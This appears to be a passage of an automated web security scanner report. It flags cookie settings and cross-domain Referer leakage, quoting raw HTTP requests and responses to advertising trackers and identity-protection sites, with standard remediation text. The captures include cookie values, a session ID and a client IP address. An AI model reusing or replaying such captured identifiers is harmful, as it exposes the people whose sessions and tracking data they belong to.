The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adcedge/lb?site=695501&srvc=1&betr=lifelock1_cs=1&betq=4353=380320 HTTP/1.1 Host: leadback.advertising.com Proxy-Connection: keep-alive Referer: http://www.lifelock.com/about/lifelock-in-the-community/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; F1=BoQkz2kAAAAABq5CAEAAgEABAAAABAAAAIAAgEA; BASE=RgwqvyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGAOUajnq9Kr8LAPA72buRiJhbHyGHv70yPsyIf845qx6eWI/QdsmU5nmI!; ROLL=boAnu2y6iNBg1C4LhynzuD54K75V4u/oBlRpVwKMMqbw4GP5fRga2X2wn3+EsmF!; C2=vK5sN5pqHIxFG8povgg3sYARSKMCItdxvhQ3WX8bIMa4F/GCKGexvhQ3gZ8b1qKCaMrBEV7qIEysG/WkBgAoNXAc; GUID=MTMwMzYxNDEyNzsxOjE2cjRvcHExdHZsa21sOjM2NQ
Response
HTTP/1.1 302 Found Connection: close Date: Sun, 24 Apr 2011 03:08:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Location: https://ad.yieldmanager.com/pixel?id=562283&t=2 Set-Cookie: C2=wQ5sN5pqHIxFG7povgg3sY8QSKMCItdhvhQ3WX4bIMa4F+GCKGehvhQ3gZ4b1qKCaMrxDV7qIEysG+WkBgAoNXAc; domain=advertising.com; expires=Tue, 23-Apr-2013 03:08:32 GMT; path=/ Set-Cookie: GUID=MTMwMzYxNDUxMjsxOjE2cjRvcHExdHZsa21sOjM2NQ; domain=advertising.com; expires=Tue, 23-Apr-2013 03:08:32 GMT; path=/ Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Cache-Control: private, max-age=3600 Expires: Sun, 24 Apr 2011 04:08:32 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /dsatserving2/servlet/log?pxid=1124&nlt=ltpx&url=http%3A%2F%2Fwww.identityguard.com%2Fipages%2Fle4%2Fletp30daysfree1.html%3Fmktp%3DNext%26utm_medium%3Daffiliates%26hid%3D205557649%26campid%3D13%26c1%3Did4%2B106163471CD1%26c2%3DCD1%26cenhp1%3D1&impt=0&imps=0 HTTP/1.1 Host: leadback.netseer.com Proxy-Connection: keep-alive Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: netseer_v3_gi="1327,10542,www.marketminute.com,0,0,1,imp3fd315f009766d06,1303536932410,"; netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824"; netseer_v3_lvi="2:usr3fd49cb9a7122f52:1303083764824,1303536932417,aHR0cDovL3d3dy5tYXJrZXRtaW51dGUuY29tLw,US-TX-623-Dallas"
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /msftcookiehandler?t=1&c=MUID%3dB506C07761D7465D924574124E3C14DF HTTP/1.1 Host: m.adnxs.com Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG68%ErkX00s]#%2L_'x%SEV/i#+O:4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`FJCe#'.gAbjII9rT^:Vp?%xJEuJ`Be1]=6>9ihz-.bH-TwYBtaP2Z*7o9)NCI!IqN_21C4Nr5>oyW]]FlbwqoN3oN9Q[Ry.HV1loEoVkAa=QO!jG:cNKQi?NwxN+T84X=?B#oJ:g/9Y=s#M^w'=n'm1_EClIL>iuL`>)XwT?jd`+<zV!^5>9OHbQMHOGjU=yDoEKxAEZjL$$E[8VF_T1y`$R^fewUBXEHbOf)CrV(<9*nUGY%7uj)@9HgK.z!%#r!Kes:Q'TOAI]f*J+>[/Bh/ce?bDXi/Si-1dp=y:2fw>PouZtY[Z5a<'%a=4=2#H)DhRBw#R0T!9?.JE/qX3
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 25-Apr-2011 12:31:03 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 12:31:03 GMT; domain=.adnxs.com; HttpOnly Content-Length: 43 Content-Type: image/gif Date: Sun, 24 Apr 2011 12:31:03 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /w/tre?ad_id=20016;evt=13529;cat1=13666;cat2=15184 HTTP/1.1 Host: media.fastclick.net Proxy-Connection: keep-alive Referer: http://www.lifelock.com/about/lifelock-in-the-community/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pluto2=728800512746; lyc=BAAAAARUu69NACAAATxgIASgAAXhVAAAj7qAFwFmUKAUIAAGizcAAGuRs2AvATBOIBCgAAFQO6AIIADgBRcBAAA=; pluto=728800512746
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /event/img?mt_id=102119&mt_adid=100377&v1=&v2=&v3=&s1=&s2=&s3=&ord=503629049 HTTP/1.1 Host: pixel.mathtag.com Proxy-Connection: keep-alive Referer: http://www.lifelock.com/about/lifelock-in-the-community/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=9:1303494339|3:1303506763|2:1303506773|5:1303494463|10001:1303152836|1:1303494357; ts=1303614126
Response
HTTP/1.1 200 OK Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-n1a pid 0x6317 25367 Cache-Control: no-cache Content-Type: image/gif P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Date: Sun, 24 Apr 2011 03:08:32 GMT Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07 Connection: Keep-Alive Set-Cookie: ts=1303614512; domain=.mathtag.com; path=/; expires=Mon, 23-Apr-2012 03:08:32 GMT Content-Length: 43
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=801362/size=728090/u=2/bnum=53765754/hr=7/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.hotelclub.com%252F HTTP/1.1 Host: r1-ads.ace.advertising.com Proxy-Connection: keep-alive Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; F1=BoQkz2kAAAAABq5CAEAAgEABAAAABAAAAIAAgEA; BASE=RgwqvyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGAOUajnq9Kr8LAPA72buRiJhbHyGHv70yPsyIf845qx6eWI/QdsmU5nmI!; ROLL=boAnu2y6iNBg1C4LhynzuD54K75V4u/oBlRpVwKMMqbw4GP5fRga2X2wn3+EsmF!; C2=1V5sN5pqHIxFG7povgg3sY8QSKMCItdhvhQ3WX4bIMa4F+GCKGehvhQ3gZ4b1qKCaMrxDV7qIEysG+WkBgAoNXAcxOCCsRpBwB; GUID=MTMwMzYxNDgzNzsxOjE2cjRvcHExdHZsa21sOjM2NQ
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hc/71003277/?&site=71003277&cmd=mTagStartPage&lpCallId=565276490757-576158150099&protV=20&lpjson=1&page=http%3A//www.hotelclub.com/ManageBooking.asp&id=1034388051&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-hotelclub-chat-en&activePlugin=none&cobrowse=true&PV%21unit=hotelclub-chat&PV%21visitorActive=1&SV%21language=en&title=View/Cancel%20Your%20Booking&referrer=http%3A//www.hotelclub.com/&cookie=HTC%3DAppVer%3D1%252E0%3B%20anon%3D1129876971252011042422094%3B%20ASPSESSIONIDCCQRQCTQ%3DFDCOCPBANKNGOIFKLDNNOFAM%3B%20s_vi%3D%5BCS%5Dv1%7C26DA09858516231B-400001A4A00530FD%5BCE%5D%3B%20WT_FPC%3Did%3D173.193.214.243-2165807168.30147192%3Alv%3D1303643486711%3Ass%3D1303643390479%3B%20s_cc%3Dtrue%3B%20s_lp%3Dno%3B%20s_sq%3D%255B%255BB%255D%255D HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://www.hotelclub.com/ManageBooking.asp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=5427601522506632860; LivePersonID=LP i=16601209214853,d=1303177644; HumanClickACTIVE=1303647088962
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:11:35 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickSiteContainerID_71003277=STANDALONE; path=/hc/71003277 Set-Cookie: LivePersonID=-16601209214853-1303647090:-1:-1:-1:-1; expires=Mon, 23-Apr-2012 12:11:31 GMT; path=/hc/71003277; domain=.liveperson.net Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Sun, 24 Apr 2011 12:11:31 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 1998
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G?b=u4up%3DsupLm%2Bupqz5u5A%2B5tqr5%2B3q4063oq_03pq3uzsFG--ECDD-CG-EF--EC-DC-CGOPD%2663x%3Dt5514%25FM%25ER%25ER888.qo0z46yq3.q26urm9.o0y%25ERo0z46yq3%25ERxmzpuzs.qt5yx%25FR%25EHHq45m35%25FP%25EIo0y1mzAZmyq%25FPov_q4z1F3%3C%3Ct551%3A%2F%2F888.w2BArv.o0y%3AKC%2Foxuow-DLDDLID-DCJHDLKJ%3C%3CS%3C%3C HTTP/1.1 Host: www.apmebf.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: S=g14vo-36788-1303134591742-0g
Response
HTTP/1.1 302 Found Server: Resin/3.1.8 P3P: policyref="http://www.apmebf.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT" Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Expires: Sun, 24 Apr 2011 03:10:07 GMT Location: http://www.emjcd.com/5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH?r=xtje%3DhjeAb%2Bjefoujuz%2Buifgu%2Bsftpvsdf_psefsjoh45--3122-15-34--31-21-15DE2%26vsm%3Diuuqt%254B%253G%253Gxxx.fdpotvnfs.frvjgby.dpn%253Gdpotvnfs%253Gmboejoh.fiunm%254G%25366ftubsu%254E%2537dpnqbozObnf%254Edk_ftoq4s<dkp!x7ry-t2xepAz<iuuq%3A%2F%2Fxxx.lr0zgk.dpn%3A91%2Fdmjdl-2A22A72-21862A98<<H<< Set-Cookie: LCLK=cjo!w6qx-s1wdo9y; domain=.apmebf.com; path=/; expires=Fri, 22-Apr-2016 03:10:07 GMT Content-Type: text/html Connection: close Date: Sun, 24 Apr 2011 03:10:07 GMT Content-Length: 983
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH?r=xtje%3DhjeAb%2Bjefoujuz%2Buifgu%2Bsftpvsdf_psefsjoh45--3122-15-34--31-21-15DE2%26vsm%3Diuuqt%254B%253G%253Gxxx.fdpotvnfs.frvjgby.dpn%253Gdpotvnfs%253Gmboejoh.fiunm%254G%25366ftubsu%254E%2537dpnqbozObnf%254Edk_ftoq4s%3Cdkp!x7ry-t2xepAz%3Ciuuq%3A%2F%2Fxxx.lr0zgk.dpn%3A91%2Fdmjdl-2A22A72-21862A98%3C%3CH%3C%3C HTTP/1.1 Host: www.emjcd.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet HTTP/1.1 Host: www.securepaynet.net Proxy-Connection: keep-alive Referer: http://kroogy.com/pub/banner_728_90_random.php User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 Set-Cookie: ASP.NET_SessionId=h05vhh55un4r0t3lzxjaq3m2; path=/; HttpOnly X-AspNet-Version: 2.0.50727 Set-Cookie: adc471557=US; domain=securepaynet.net; path=/ Set-Cookie: flag471557=cflag=us; domain=securepaynet.net; expires=Tue, 24-Apr-2012 12:42:00 GMT; path=/ Set-Cookie: currency471557=potableSourceStr=USD; domain=securepaynet.net; expires=Mon, 23-Apr-2012 12:42:00 GMT; path=/ Set-Cookie: currencypopin471557=cdisplaypopin=false; domain=securepaynet.net; expires=Tue, 24-Apr-2012 12:42:00 GMT; path=/ Set-Cookie: SplitValue471557=16; domain=securepaynet.net; expires=Mon, 25-Apr-2011 12:42:00 GMT; path=/ Set-Cookie: traffic=cookies=1&referrer=http://kroogy.com/pub/banner_728_90_random.php&sitename=www.securepaynet.net&page=/default.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=isc=kro_2011&ci=1767&prog_id=indextonet&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=16; domain=securepaynet.net; path=/ X-Powered-By: ASP.NET P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND" Date: Sun, 24 Apr 2011 12:42:01 GMT Content-Length: 156097
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/javascript; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: traffic=cookies=1&referrer=http://www.securepaynet.net/default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet&sitename=www.securepaynet.net&page=/external/json/SalesBanner.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=layout=Sidebar&isc=kro_2011&targetDivId=ctl00_sidebarController_SidebarBanner_pnlSalesBanner&prog_id=indextonet&callback=jsonp1303648053058&_=1303648053496&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=30; domain=securepaynet.net; path=/ X-Powered-By: ASP.NET P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND" Date: Sun, 24 Apr 2011 12:42:20 GMT Content-Length: 124
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /idfide01/?promoCodeRefIde=NXTIDF01IDEFT&promoCodeRefIdf=NXTIDF01IDFFT15 HTTP/1.1 Host: www.trustedid.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /registration.php?promoRefCode=NXTIDF01IDEFT HTTP/1.1 Host: www.trustedid.com Connection: keep-alive Referer: https://www.trustedid.com/idfide01/?promoCodeRefIde=NXTIDF01IDEFT&promoCodeRefIdf=NXTIDF01IDFFT15 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TIDT=173.193.214.243.1303614754152763; TSI=6rjj85kupb6n5r77pnlgtoq3g0; promoRefCode=NXDIRSUZIDPANN
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /suzeidprotector/?promoRefCode=NXDIRSUZIDPANN HTTP/1.1 Host: www.trustedid.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Identity Theft Protection from Suze Orman</title> <meta content= ...[SNIP]...
19. Cross-domain Referer leakagepreviousnext There are 39 instances of this issue:
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
GET /ads/?t=i&f=j&p=5112&pl=bca52e1b&rnd=78334213420748700&clkurl=http://ib.adnxs.com/click/Z2ZmZmZmCkBmZmZmZmYKQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAiR7ltAAAAAA./cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE%26num%3D1%26sig%3DAGiWqtzXEDaddpfmi41fzFhJXYz2hn5O0A%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1 Host: ad.amgdgt.com Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUknmntfmI4gkEaJqB02eiFjl3sHgDA3gBY2BgYGZgmhzKwOrwhIFRJ4.B4aPQfyBgYGDUzw9grGZg8rdhYHnhzcCoxcTAcOkZAwMDJ0guTXlWEFDOCirHCJR7AJdTklIHssHAd3MGAwMbAwNLCBMrIxtQWeAtRiYgxZLJyAqklhaAefK7GEGKFMwYGYCCjPrtWZknIfoBAsMbMQ--
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: UA=AAAAAQAUBmuE9vQaUZPvGEt_WOLrL1FD0BkDA3gBY2BgYGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo357TVwyA9PkUAZWhycMjDp5DAwfhf4DAUguP4CxmoHJ34aB5YU3A6MWEwPDpWcwfWnKs4KAclZQOUag3AO4nJKUOpANBr6bMxgY2BkYAm8xMgEVMRgwMgApBTMwtbQALMiSycgKFGQJYWJlZAMy5HcxMrDBHQc2BgAGbyFK; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 12:29:25 GMT; Path=/ Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache, no-store P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript;charset=UTF-8 Content-Length: 4062 Date: Sun, 24 Apr 2011 12:29:24 GMT
